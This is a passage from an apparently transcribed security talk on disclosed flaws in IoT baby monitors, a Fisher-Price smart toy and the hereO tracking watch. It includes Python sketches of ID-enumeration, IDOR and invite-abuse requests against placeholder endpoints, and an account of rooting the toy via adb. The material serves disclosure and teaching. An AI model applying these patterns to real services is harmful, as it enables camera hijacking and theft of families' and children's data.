at the end, I'm going to keep it. And again, this is your average person, not this audience per se.
This is just your average person buying a baby monitor. They don't care; they're like, great, write it down, put it on a Post-it on the monitor, whatever. So this is a terrible design pattern, and it gets even worse, because that serial integer is your account ID. And in terms of all the bad things: we could steal every alert video for every camera on one product; we could own video traffic and do ad hoc CGI script execution on cameras in another state. With this one, they have a web service, they have the ability to add privileged accounts, and with one URL, completely unauthenticated, knowing only a serial integer, we can add ourselves as an admin to someone's camera. Again: bash, "for i in 1..whatever", and you can literally add your account as an admin to every single online camera from this company. And they're nice enough to email you a password at that point, so you take the email address you put in and the password they sent, download the mobile app, log in as admin, start video, stop video, move the camera around, whatever you want. One HTTP request, unauthenticated, a serial integer for the account ID, every camera from that company, done. These are all problems, I think we can agree. At Rapid7, we have a pretty good disclosure program; we do 60 days for everything by rote, and that landed on July 4th, when no one in the US checks their email, sorry to all those companies, so it was probably July 6th before they finally checked their email and realized all these bad things had happened. We also work with CERT every time, because CERT can help make things go easier; they're government, and they scare people into doing the right thing.
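The shape of that attack, minus the real endpoint, can be sketched in a few lines. The host, path, and parameter names below are all invented for illustration; only the pattern, one unauthenticated request per enumerated integer account ID, comes from the talk:

```python
# Hypothetical sketch of the add-admin-by-serial-ID flaw described above.
# Endpoint, host, and parameter names are invented placeholders.
from urllib.parse import urlencode

def add_admin_request(account_id: int, attacker_email: str) -> str:
    """One unauthenticated request that grants admin on someone's camera."""
    params = urlencode({"group_id": account_id,
                        "email": attacker_email,
                        "role": "admin"})
    return f"https://api.example.com/addUser?{params}"

def all_requests(id_range, attacker_email):
    """The 'bash for loop' equivalent: one request per candidate ID."""
    return [add_admin_request(i, attacker_email) for i in id_range]
```

Because the account ID is a serial integer with no authentication in front of it, the cost of attacking every customer is the same as the cost of attacking one.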
So, a little bit of a scorecard, if you will. Because this is more like a case study, I wanted to see how the whole market space of baby monitors actually looked. There's no perfect way to do metrics for security, I hate to tell anyone in here who tries to do that for a living; there are a lot of good ideas and a lot of fuzzy math. All I wanted was a little apples-to-apples, not even good apples, just apples to apples. So I picked some things: are all the local API calls encrypted? Are all the cloud API calls encrypted? Do they have telnet or SSH on by default? And other basic stuff like that. I made this terrible scoring methodology that you will all disagree with; I disagree with it most days as well. But I just wanted to quantify the hits and misses a little bit. Here's where we ended up. Taking that scale, doing percentages, standard grading-scale stuff, we got a very upset baby who is loathing the entire baby monitor market. We have one D and the rest are Fs. The D is just over the line, and a D is not a thing to be proud of anyway. There was actually a zero, from the $200 camera from iBaby, and zero is never a good thing in security, so that's bad. So that's the baby monitor research. There were a lot of other bugs and default passwords we don't have time for. The good news is that from working with those vendors, a lot of those things got patched very quickly. Families are safe, yay. We also had some good conversations with many of the vendors about other products they're working on, talking about roadmaps and such, so hopefully we prevented some future bugs. And in New York, actually, I'm going to screw this up...
I think it's the Department of Consumer Affairs in New York; they went ahead and opened an investigation into, I believe, six of these vendors. It's a formal investigation that I have no insight into other than a conversation I had with them: state government basically going after vendors for, I'm going to assume, negligence or something similar, because these are pretty problematic things for people's privacy. I'm not sure where that's going to end up, but it's certainly important that people are taking the time to look into these issues. So the next part, and we're doing okay on time: the Fisher-Price Smart Toy. Anyone have one of these, or seen one on TV? I think there have been some commercials here and there. It's cute, basically a Teddy Ruxpin with Bluetooth and Wi-Fi, if you had a Teddy Ruxpin back when. I actually got this thing at, I guess, a diaper party, as we say; basically my friends celebrating my baby on the way by giving me stuff. I got it as a gift from a friend who's also in infosec and knows I do this kind of work, more in the spirit of "I know you will never give this to your child because you're going to ruin it as soon as I hand it over." And that's what happened. It was sewn really well, to their credit, so it's not really my fault, I guess. It has Wi-Fi; it has Bluetooth, which isn't actually used for anything right now but might be part of a future feature set; and it has a camera. And when you hear "child's toy, camera," you think you know where this is going. Actually, that's not where it goes at all, because, first off, the camera's terrible. What the camera's meant for: there are these little cards, and the toy just does image recognition when you hold a card up to it and goes, oh, I know that's a toothbrush, therefore I'll do the toothbrush game.
It's not streaming over the internet. It's not uploading your child's photos anywhere. It's all local processing within one application. Not to say nothing could go wrong with that, mind you, but that's inherently how it works, and the same goes for the audio: the child says "play a game" and the toy goes, okay, I'll play a game. It's all local; it's not over the internet, it's not streaming. I'm not an alarmist; I like bugs that are real bugs, and I'm not going to tell you these are things that are not things. So the interaction is basically games, songs, learning activities: a child's learning toy with Wi-Fi. And there's a mobile app, which is where the problem comes in, FYI. The mobile app is for parents. The parents set up a profile, and of course the profile asks for your kid's name, date of birth, and all this other PII that you probably shouldn't need to give to a toy. So we ripped open this toy mercilessly. I tried to do a Frankenstein job on it later and just gave up; that toy is ruined. And here's a fun hardware thing, for varying values of "fun." There's a micro-USB charging port on the back, so I plug it into my computer and check for data pins: nothing. That sucks. Pull the whole thing open and find another USB port. Now, I'm not a hardware person; I can do just enough to do work like this. So I thought maybe the USB port on the outside connects to the one inside. Nope, a completely different USB port. You plug into that one, run "adb shell", and you're in the Android environment on this toy. You're root; you're good to go.
So you run all the commands, steal all the files, grab all the APKs, reverse everything; you know how this goes. Again, as you've probably noticed by now, I'm a scale person. Owning one toy in some kid's room by standing next to their Wi-Fi network is not really interesting to me; interesting from a research perspective, but not for what I care about. So I looked at the mobile app, because internet, and there were a bunch of API calls. Some of them were protected in a way I'll explain in a second; some were not. What would happen is effectively insecure direct object reference: you're logged in with your own session as the attacker, and you can supply a device ID or a customer ID, both integers, and some of the API calls would execute on behalf of someone else's account. The ones that worked would let you steal every child's profile data: name, date of birth, gender, spoken language, and all the toys associated with the account. I was also able to hijack toys: pick a toy by device ID, say "this is my toy now," and then my mobile app would have that other child's toy and I could make it play games and do whatever it does. There's no audio over the internet, again, so I can't yell at a child; that would be worse. And the accounts themselves have profiles inside the mobile app account, so I could create, update, and delete profiles in the parent's app. So I can do dumb things like rename a profile "I'm the captain now," because I was watching Captain Phillips and thought that was hilarious at the moment. You can change names, make obscene accounts, put them on the parents' phone, change details, all that kind of stuff.
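The IDOR pattern is easy to show in the abstract. Here's a hypothetical sketch where a perfectly valid session is combined with somebody else's integer ID; the endpoint and field names are invented for illustration:

```python
# Hypothetical IDOR sketch matching the pattern above: a valid attacker
# session, but the object acted on is chosen by an integer ID whose
# ownership the server never checks. Endpoint and parameter names are
# invented placeholders.

def child_profile_request(session_token: str, customer_id: int) -> dict:
    """Request that *should* be limited to the caller's own customer_id."""
    return {
        "url": f"https://api.example.com/v1/customers/{customer_id}/children",
        "headers": {"Authorization": f"Bearer {session_token}"},
    }

# Authenticated as the attacker, but requesting customer 1234's data.
# A correct backend would compare the customer ID bound to the session
# with the ID in the path and reject the mismatch.
req = child_profile_request("attacker-session-token", 1234)
```

Note that the request is fully authenticated; the bug is authorization, not authentication, which is why it survives past a login screen.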
So it's mostly harassment; it's annoying, not scary in the traditional sense. But if you're a parent who's not in infosec in any way, shape, or form, you'd probably find it terrifying if the name of your child's toy turned into an obscenity one night. That would not make you feel okay. Again, disclosure timelines: stuff got fixed. Fisher-Price was really good to work with; we worked well together on some things and looked a little bit ahead as well. So the last quick thing we'll talk about: the hereO smartwatch. This was a smartwatch initially funded on Indiegogo for 215K US and then $2 million more, so a pretty decent investment in an IoT smartwatch. There's a mobile app as well as the watch, and the nuance to think about is that they provide a platform and these things are clients: the mobile app is a client, the smartwatch is a client, and the backend platform unifies everything and does all the magic. The mobile app has been out forever; the watches, as far as I know today, are still in beta and have only been given to a handful of Indiegogo backers. But the app has been around for multiple years with full functionality: it tracks you, it does geo-fencing, it does all these tracking-people things. It's basically Find My Friends, but in their own app, in their own ecosystem, for what that's worth. So a lot of very creepy things you can do. As an app developer, if you've developed, reversed, or hacked enough things, you start noticing things in API calls and JSON blobs that just irk you: that's weird, and it's probably weird for a bad reason. The TL;DR here is that I saw a request go over that had both a session ID and a user ID.
In most cases, your session ID is linked to your user ID, and you shouldn't have to say "I am user XYZ," because your session already knows you're user XYZ. Sometimes it's innocuous: they just SELECT everything in their MySQL or SQLite query and shoot all the data over. In this case, the red flag was a real red flag. I'll have to explain this because the slide is super small, I apologize. We've got three things happening here: an attacker account, a pawn account the attacker created, and a target account. The pawn account invites the attacker, but puts the target's user ID in the request. So they invite one person, but attach the user ID of a different person, the target. I, as the attacker, then receive an email saying the pawn account wants to be my friend; I hit a link and it says, great, you've accepted. The pawn account gets a notification that so-and-so accepted the request, like a social network. The only nuance here, bad for me, good for the world, is that the target gets an email saying the attacker, hopefully not actually named "attacker", was added to their family account. What's important here, thinking about social engineering, which isn't really my shtick: people ignore stuff you'd think they would never ignore if you're a security person, but in reality they do. The cool thing is that the name I put in as the attacker can be HTML, which gets sent into the email the target receives, so maybe I can do some weird DOM stuff in certain mail clients. But I can also just use something very simple, like "this is a test, please ignore" as my account name, and the person probably won't care, won't notice, won't think twice; they'll just delete the email and go on their way.
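Here's a hypothetical sketch of that invite abuse: the pawn's authenticated request nominally invites the attacker, but the server trusts a caller-supplied target user ID. All endpoint and field names below are invented; the key detail from the talk is that the server honors a client-supplied user ID instead of deriving it from the inviter's session:

```python
# Hypothetical sketch of the family-invite abuse described above. Field
# and endpoint names are invented placeholders.

def build_invite(pawn_session: str, attacker_email: str,
                 target_user_id: int, display_name: str) -> dict:
    return {
        "url": "https://api.example.com/v1/family/invite",
        "headers": {"Authorization": f"Bearer {pawn_session}"},
        "json": {
            # Should be ignored server-side and taken from the session;
            # instead it selects whose family the attacker joins.
            "user_id": target_user_id,
            "invitee_email": attacker_email,
            # Rendered into the target's notification email, so it can
            # be made innocuous ("this is a test, please ignore").
            "invitee_name": display_name,
        },
    }

invite = build_invite("pawn-session", "attacker@example.com", 4242,
                      "this is a test, please ignore")
```

Since the target user ID is just an integer, the same request repeated across the ID space joins the attacker to every family account on the platform.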
The other thing is that as soon as I'm added, and they have no control over this, I immediately get the full history of all the people; I see all the data, done. So even if they check their email and think, oh my god, someone might be in my account, I've already gotten all their information. I already know where everyone is, where their children are, where they are. It's not good. At best the response is reactive, and in reality they're probably not going to notice at all. So: the pawn account sends a request, the attacker accepts it, I control all of that, and now I see the target account. The target is, again, just an integer, so enumerate all the integers, get all the accounts, get all the data, get all the people. Disclosure was a little slower on this one, there were some hiccups, I will say, but we got it done. So those are all the IoT things, all the terrible things you're now probably scared to buy for your children, and then a couple of closing items. BuildItSecure.ly is an initiative I co-founded a few years ago; we work with IoT vendors that have less money, resources, time, team, or expertise, and we run what I'll loosely call bug bounties, except there's no monetary value; it's all pro bono for us, just helping them out and trying to up the ante on IoT security a little bit. There's also an OWASP IoT Top 10. The Online Trust Alliance has a vendor-focused IoT framework that gives people at least a basic checklist; checklists don't usually solve problems, but vendors have no clue right now what they should be doing or thinking about, so it's at least a little better than nothing. And I think Google has some cool projects trying to take on the firmware problem, because that's a huge problem, and the device-to-internet communication problem, also huge, to give you secure-by-default, or at least secure-ish-by-default, building blocks, more so than we have now.
So I've pretty much run out of time. I know Guillain and Jordan need to get up here, and I want to see their talk. I'll be around after their talk, so if you want to say hi, I'm glad to chat. The slides are online; if you want to shoot me an email, feel free, and I'll get you the deck. Thank you for having me; it's great to be in Montreal. Have a good day.